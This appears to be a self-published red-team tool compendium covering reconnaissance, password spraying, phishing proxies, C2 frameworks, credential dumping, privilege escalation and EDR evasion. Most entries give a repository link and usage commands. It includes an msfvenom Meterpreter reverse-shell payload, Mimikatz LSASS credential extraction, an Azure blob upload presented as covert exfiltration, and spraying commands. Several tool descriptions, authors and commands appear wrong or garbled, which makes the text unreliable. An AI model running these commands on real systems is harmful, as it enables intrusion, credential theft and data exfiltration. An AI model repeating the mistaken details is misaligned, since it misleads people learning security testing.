RED TEAM TOOLS BY GOVERDHAN KUMAR

RED TEAM TOOLS BY GOVERDHAN KUMAR

Red Team Arsenal:

A Comprehensive
Compilation of Tools
For
Offensive Security
Operations

GOVERDHAN KUMAR
RED TEAM TOOLS BY GOVERDHAN KUMAR

INTRODUCTION

Navigating the dynamic landscape of cybersecurity requires a comprehensive arsenal

of tools for offensive security operations. This curated collection provides a diverse
range of tools, categorized by their roles, to empower red teamers with the
capabilities needed to assess, simulate, and enhance organizational defenses. From
reconnaissance to defense evasion, this compilation equips security professionals
with the means to responsibly uncover vulnerabilities, reinforce cybersecurity, and
contribute to a safer digital environment.
RED TEAM TOOLS BY GOVERDHAN KUMAR

Catalog
RECONNAISSANCE 1
1. RustScan: 1
2. NmapAutomator: 1
3. AutoRecon: 1
4. Amass: 1
6. Recon-NG: 2
7. AttackSurfaceMapper: 2
8. DNSDumpster: 2
INITIAL ACCESS 2
1. SprayingToolKit: 2
2. o365Recon: 3
3. Psudohash: 3
4. CredMaster: 3
5. DomainPasswordSpray: 3
6. TheSprayer: 3
7. TREVORspray: 3
DELIVERY 4
1. o365AttackToolKit: 4
2. EvilGinx2: 4
3. GoPhish: 4
4. PwnAuth: 5
5. Modlishka: 5
COMMAND AND CONTROL 5
1. PoshC2: 5
2. Sliver: 5
3. SILENTTRINITY: 6
4. Empire: 6
5. AzureC2Relay: 6
6. Havoc C2: 7
7. Mythic C2: 7
CREDENITIAL DUMPING 7
1. MimiKatz: 7
2. HekaTomb: 8
3. SharpLAPS: 8
4. Net-GPPPassword: 8
5. PyPyKatz: 8
PRIVILEGE ESCALATION 9
1. SharpUp: 9
2. MultiPotato: 9
3. PEASS - Privilege Escalation Awesome Scripts SUITE: 9
4. Watson: 9
5. Bat-Potato: 10
DEFENSE EVASION 10
1. Villain: 10
2. EDRSandBlast: 10
3. SPAWN - Cobalt Strike BOF: 10
4. NetLoader: 11
5. KillDefenderBOF: 11
CONCLUSION 11
RED TEAM TOOLS BY GOVERDHAN KUMAR

RECONNAISSANCE

1. RustScan:

 Description: RustScan is a fast port scanner that identifies open ports and services on target
systems quickly.
 Installation: You can install RustScan using Rust's package manager, Cargo. Run these commands:

git clone https://github.com/RustScan/RustScan.git

cd RustScan
cargo build --release

 Usage: After installation, run `./target/release/rustscan` followed by the target IP or hostname.

2. NmapAutomator:

 Description: NmapAutomator automates Nmap scans and provides an organized report of

discovered services and vulnerabilities.
 Installation: Download the script from GitHub repository:
https://github.com/21y4d/nmapAutomator
 Usage: Place the script in a directory containing your Nmap scan results. Run the script with
`./nmapAutomator.sh`.

3. AutoRecon:

 Description: AutoRecon is a multi-threaded reconnaissance tool that performs automated

enumeration of services.
 Installation: Install AutoRecon using pip with `pip install autorecon`.
 Usage: Run `autorecon` followed by the target IP or hostname.

4. Amass:

 Description: Amass is a versatile tool for subdomain enumeration and information gathering.
 Installation: Download the tool from GitHub repository: https://github.com/OWASP/Amass
 Usage: Use commands like `amass enum` and `amass intel` followed by relevant flags and
options.

1
RED TEAM TOOLS BY GOVERDHAN KUMAR

5. CloudEnum:

 Description: CloudEnum identifies cloud resources and assets related to a target domain.
 Installation: Download from GitHub repository: https://github.com/initstring/cloud_enum
 Usage: Run `python3 cloud_enum.py --domain target.com` to perform cloud-based
reconnaissance.

6. Recon-NG:

 Description: Recon-NG is a powerful reconnaissance framework that gathers data from various
sources.
 Installation: It's pre-installed in Kali Linux. For other systems, follow the guide here:
https://github.com/lanmaster53/recon-ng
 Usage: Launch `recon-ng` and execute modules using commands like `use`, `options`, and `run`.

7. AttackSurfaceMapper:

 Description: AttackSurfaceMapper discovers and maps an application's attack surface.

 Installation: Download from GitHub repository:
https://github.com/superhedgy/AttackSurfaceMapper
 Usage: Run `python3 attack_surface_mapper.py -u https://target.com`.

8. DNSDumpster:

 Description: DNSDumpster is an online tool for finding DNS information and subdomains.
 Usage: Visit the website https://dnsdumpster.com/ , enter the target domain, and analyze the
results.

INITIAL ACCESS

1. SprayingToolKit:

 Description: SprayingToolKit automates password spraying attacks to test weak passwords

across a list of users.
 Installation: Download from GitHub repository: https://github.com/byt3bl33d3r/SprayingToolkit

2
RED TEAM TOOLS BY GOVERDHAN KUMAR

 Usage: Run `python3 sprayingtoolkit.py -u users.txt -p passwords.txt -t https://target.com ` to

perform password spraying.

2. o365Recon:

 Description: o365Recon assists in gathering information about Microsoft 365 environments

for potential attack vectors.
 Installation: Download from GitHub repository: https://github.com/gremwell/o365recon
 Usage: Run `python3 o365recon.py -c target_company.com` to start the recon process.

3. Psudohash:

 Description: Psudohash generates password candidates using permutations and rules for
password cracking.
 Installation: Download from GitHub repository: https://github.com/DominicBreuker/psudohash
 Usage: Run ` psudohash -p password_rules.txt -r rules.txt ` to create password permutations.

4. CredMaster:

 Description: CredMaster is a tool for crafting malicious documents to capture credentials during
phishing attacks.
 Installation: Download from GitHub repository: https://github.com/0xZDH/CredMaster
 Usage: Edit `CredMaster.py` with your settings and run it using `python3 CredMaster.py`.

5. DomainPasswordSpray:

 Description: DomainPasswordSpray performs password spraying attacks against domain

accounts.
 Installation: Download from GitHub repository:
https://github.com/dafthack/DomainPasswordSpray
 Usage: Modify the script's settings in `spray.sh`, and run it using `./spray.sh`.

6. TheSprayer:

 Description: TheSprayer is a tool for automating password spraying attacks.

 Installation: Download from GitHub repository: https://github.com/1N3/TheSprayer
 Usage: Edit `thesprayer.sh` with your settings and run it using `./thesprayer.sh`.

7. TREVORspray:

 Description: TREVORspray is a password spraying tool designed for Office 365 environments.

3
RED TEAM TOOLS BY GOVERDHAN KUMAR

 Installation: Download from GitHub repository:

https://github.com/blacklanternsecurity/TREVORspray
 Usage: Edit `TREVORspray.sh` with your settings and run it using `./TREVORspray.sh`.

DELIVERY

1. o365AttackToolKit:

 Description: o365AttackToolKit is a collection of tools for simulating phishing attacks and

assessing security within Office 365.
 Installation: Download from GitHub repository: https://github.com/gremwell/o365attacktoolkit
 Usage:
 Modify the configuration files (config.yaml and templates/) to fit your needs.
 To run a phishing campaign:
python3 office.py -c config.yaml
 The toolkit offers various attack scenarios like sending malicious URLs, attachments, and
more. Refer to the documentation for detailed instructions.

2. EvilGinx2:

 Description: EvilGinx2 is a tool for advanced phishing attacks, capturing credentials through
browser-based techniques.
 Installation: Download from GitHub repository: https://github.com/kgretzky/evilginx2
 Usage:
 Configure the config.yaml file to set up target domains and phishing scenarios.
 To start the server:
python3 evilginx.py -p config.yaml
 The tool acts as a proxy, capturing credentials as users interact with the phishing pages.

3. GoPhish:

 Description: GoPhish is an open-source phishing framework that enables you to create and
manage phishing campaigns.
 Installation: Download from GitHub repository: https://github.com/gophish/gophish
 Usage:
 Start the GoPhish server:
./gophish
 Access the GoPhish web interface and create a new campaign.
 Customize email templates, landing pages, and other campaign details.
 Launch the campaign and monitor the results through the dashboard.

4
RED TEAM TOOLS BY GOVERDHAN KUMAR

4. PwnAuth:

 Description: PwnAuth is a tool for performing password spraying and credential stuffing attacks
against authentication services.
 Installation: Download from GitHub repository: https://github.com/fireeye/PwnAuth
 Usage:
 Configure the config.yaml file with target URLs and other settings.
 To perform a password spraying attack:
./pwnauth.py -c config.yaml --password-list passwords.txt
 The tool will attempt to authenticate using the provided passwords against the target URLs.

5. Modlishka:

 Description: Modlishka is a reverse proxy tool that automates phishing attacks, capturing user
credentials through an authentic-looking interface.
 Installation: Download from GitHub repository: https://github.com/drk1wi/Modlishka
 Usage:
 Configure the config.cfg file with target domain and redirect URL.
 To start Modlishka:
./modlishka -config config.cfg
 Modlishka acts as a reverse proxy, intercepting user traffic and capturing credentials.

COMMAND AND CONTROL

1. PoshC2:

 Description: PoshC2 is a post-exploitation framework that allows you to establish command and
control channels with compromised systems.
 Installation: Download from GitHub repository: https://github.com/nettitude/PoshC2
 Usage:
 Set up the config.yaml file with your preferences.
 Start the PoshC2 server:
./PoshC2.py
 Use the PoshC2 client for controlling compromised hosts and managing your post-
exploitation activities.

2. Sliver:

 Description: Sliver is a cross-platform C2 framework that provides secure communication and

control of compromised hosts.
 Installation: Download from GitHub repository: https://github.com/BishopFox/sliver

5
RED TEAM TOOLS BY GOVERDHAN KUMAR

 Usage:
 Configure the config file with your settings.
 Start the Sliver server:
./sliver
 Use the Sliver client for controlling compromised hosts and performing post-exploitation
actions.

3. SILENTTRINITY:

 Description: SILENTTRINITY is a post-exploitation agent that allows you to control compromised

systems over various communication channels.
 Installation: Download from GitHub repository: https://github.com/byt3bl33d3r/SILENTTRINITY
 Usage:
 Start the SILENTTRINITY server:
./start.py
 Use the SILENTTRINITY client for interacting with compromised systems and executing post-
exploitation tasks.

4. Empire:

 Description: Empire is a powerful post-exploitation framework that offers various modules for
controlling and managing compromised systems.
 Installation: Download from GitHub repository: https://github.com/BC-SECURITY/Empire
 Usage:
 Start the Empire server:
 ./empire
 Access the Empire web interface using a web browser (default: https://localhost:1337) to
manage agents and launch modules.
 Example: Launch a PowerShell module on a compromised host:

usemodule management/psinject
set Name MyScript
set Listener http
set Agent 1
set Command "Write-Host 'Hello from Empire'"
execute.

5. AzureC2Relay:

 Description: AzureC2Relay is a tool for setting up covert channels using Azure services for
command and control purposes.
 Installation:
 Download from GitHub repository: https://github.com/redcanaryco/atomic-red-
team/blob/master/atomics/T1105.002/AzureC2Relay.md
 Follow the detailed instructions provided in the repository.
 Usage:
 Configure the Azure resources as per the instructions in the repository.
 Deploy and utilize the AzureC2Relay to establish covert channels.
 Example: Use the covert channel for data exfiltration:

6
RED TEAM TOOLS BY GOVERDHAN KUMAR

az login
az storage blob upload --account-name <storage_account> --account-key
<storage_key> -- container-name <container_name> --name <blob_name> --type
block --source <local_file_path>

6. Havoc C2:

 Description: Havoc C2 is a cross-platform C2 server and agent for managing and controlling
compromised systems.
 Installation: Download from GitHub repository: https://github.com/cobbr/Havoc
 Usage:
 Follow the repository's README for installation and configuration.
 Start the Havoc C2 server and deploy agents on compromised hosts.
 Example: Start the Havoc C2 server and deploy an agent:
./havoc -l <listening_ip> -p <listening_port>
python3 havoc-cli.py -t <target_ip> -a <agent_name>

7. Mythic C2:

 Description: Mythic C2 is a customizable post-exploitation framework with a focus on payload

delivery and management.
 Installation: Download from GitHub repository: https://github.com/its-a-feature/Mythic
 Usage:
 Follow the setup instructions provided in the repository.
 Start the Mythic C2 server and deploy agents on compromised hosts.
 Example: Start the Mythic C2 server and interact with an agent:
./mythic-cli
create_payload windows apfell/mythic
create_listener http 0.0.0.0 80

CREDENITIAL DUMPING

1. MimiKatz:

 Description: MimiKatz extracts plaintext passwords and hashes from memory or registry, aiding
in credential theft.
 Installation: Download from GitHub repository: https://github.com/gentilkiwi/mimikatz
 Usage:
 Build MimiKatz by running:
make
 Extract credentials from memory:

7
RED TEAM TOOLS BY GOVERDHAN KUMAR

sekurlsa::logonpasswords
 Extract credentials from LSASS process:
sekurlsa::minidump lsass.dmp

2. HekaTomb:

 Description: HekaTomb is a toolset for dumping Windows credentials from memory using
various techniques.
 Installation: Download from GitHub repository: https://github.com/Technowlogy-
Pushpender/hekatomb
 Usage:
 Dump credentials using Mimikatz-like commands:
hekatomb.py procdump lsass
 Extract credentials from LSASS dump:
hekatomb.py parse lsass_dump.dmp

3. SharpLAPS:

 Description: SharpLAPS is a tool to retrieve LAPS (Local Administrator Password Solution)

passwords from Active Directory.
 Installation: Download from GitHub repository: https://github.com/0xthirteen/SharpLAPS
 Usage:
 Compile SharpLAPS:
csc.exe /out:SharpLAPS.exe /platform:x64 /target:exe Program.cs
 Run SharpLAPS with the target domain:
SharpLAPS.exe -t <domain>

4. Net-GPPPassword:

 Description: Net-GPPPassword is a tool to extract Group Policy Preferences (GPP) passwords

from a Windows environment.
 Installation: Download from GitHub repository: https://github.com/mwrlabs/Net-GPPPassword
 Usage:
 Run Net-GPPPassword:
powershell.exe -ExecutionPolicy Bypass -File Get-GPPPassword.ps1

5. PyPyKatz:

 Description: PyPyKatz is a Python library and toolset for parsing and interacting with LSA secrets
in memory dumps.
 Installation: Download from GitHub repository: https://github.com/skelsec/pypykatz
 Usage:
 Install dependencies:
pip install -r requirements.txt
 Parse LSA secrets from a memory dump:
pypykatz lsa minidump lsass.dmp

8
RED TEAM TOOLS BY GOVERDHAN KUMAR

PRIVILEGE ESCALATION

1. SharpUp:

 Description: SharpUp is a tool that helps identify potential privilege escalation paths by
querying system information.
 Installation: Download from GitHub repository: https://github.com/GhostPack/SharpUp
 Usage:
 Build SharpUp:
csc.exe /out:SharpUp.exe /platform:x64 /target:exe SharpUp.cs
 Execute SharpUp:
SharpUp.exe all

2. MultiPotato:

 Description: MultiPotato automates multiple privilege escalation techniques for Windows

systems.
 Installation: Download from GitHub repository: https://github.com/itm4n/MultiPotato
 Usage:
 Run MultiPotato:
powershell.exe -ExecutionPolicy Bypass -File MultiPotato.ps1
 Choose the technique you want to execute.

3. PEASS - Privilege Escalation Awesome Scripts SUITE:

 Description: PEASS is a suite of scripts designed to help with Windows privilege escalation.
 Installation: Download from GitHub repository: https://github.com/carlospolop/privilege-
escalation-awesome-scripts-suite
 Usage:
 Navigate to the specific technique's directory, e.g., Windows-Exploit-Suggester.
 Run the script to identify potential vulnerabilities:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-08-11-mssb.xls --systeminfo systeminfo.txt

4. Watson:

 Description: Watson is a Windows enumeration tool that helps automate identification of

potential privilege escalation paths.
 Installation: Download from GitHub repository: https://github.com/rasta-mouse/Watson

9
RED TEAM TOOLS BY GOVERDHAN KUMAR

 Usage:
 Run Watson
Watson.exe

5. Bat-Potato:

 Description: Bat-Potato is a Windows Privilege Escalation tool that helps automate common
privilege escalation methods.
 Installation: Download from GitHub repository: https://github.com/EmpireProject/Bat-Potato
 Usage:
 Run Bat-Potato:
powershell.exe -ExecutionPolicy Bypass -File bat-potato.ps1

DEFENSE EVASION

1. Villain:

 Description: Villain is a tool for bypassing security measures, like AV and EDR, by modifying
existing executables.
 Installation: Download from GitHub repository: https://github.com/edwardz246003/Villain
 Usage: Follow the instructions provided in the repository's README to install and utilize the tool.
python3 villain.py -i input.exe -o output.exe

2. EDRSandBlast:

 Description: EDRSandBlast is a collection of techniques to evade endpoint detection and

response (EDR) solutions.
 Installation: Download from GitHub repository:
https://github.com/MatthewDemaske/EDRSandBlast
 Usage: Review the techniques listed in the repository and implement them as needed.

3. SPAWN - Cobalt Strike BOF:

 Description: SPAWN is a Cobalt Strike Beacon Object File (BOF) that helps evade EDR solutions.
 Installation: Download from GitHub repository: https://github.com/r3dQu1nn/SPAWN
 Usage: Follow the instructions in the README for building and using the BOF with Cobalt Strike.

10
RED TEAM TOOLS BY GOVERDHAN KUMAR

4. NetLoader:

 Description: NetLoader is a technique to load shellcode via a .NET assembly to evade security
mechanisms.
 Installation: Download from GitHub repository: https://github.com/Flangvik/NetLoader
 Usage:
 Create a custom .NET assembly containing your shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f csharp >
hellcode.cs

 Compile and use the NetLoader tool to load the shellcode:

csc.exe /out:Loader.exe /platform:x64 /target:exe Loader.cs
Loader.exe shellcode.bin

5. KillDefenderBOF:

 Description: KillDefenderBOF is a Cobalt Strike Beacon Object File (BOF) that attempts to disable
Windows Defender.
 Installation: Download from GitHub repository:
https://github.com/edwardz246003/KillDefenderBOF
 Usage: Refer to the repository's README for building and using the BOF with Cobalt Strike.

CONCLUSION

In the realm of offensive security operations, a diverse toolkit is essential for effective red teaming.
This compilation presents a wide array of tools categorized by their functions, enabling security
professionals to carry out thorough assessments and simulations. From reconnaissance and initial
access to delivery, command and control, credential dumping, privilege escalation, and defense
evasion, each tool plays a crucial role in the red teaming process.

It's important to emphasize that these tools should only be used in ethical and authorized contexts,
ensuring that no harm is caused to legitimate systems or networks. Ethical hacking and penetration
testing help organizations identify vulnerabilities, improve defenses, and ultimately enhance overall
cybersecurity posture.

As the landscape of cybersecurity continues to evolve, the knowledge and skills to responsibly wield
these tools become increasingly valuable. Remember, the success of red teaming lies not just in the
tools themselves, but in the expertise, strategy, and ethical considerations that guide their application.

Follow :
https://www.linkedin.com/in/goverdhankumar
https://github.com/wh04m1i
https://linktr.ee/g0v3rdh4n
https://instagram.com/who4m1i

11
RED TEAM TOOLS BY GOVERDHAN KUMAR

12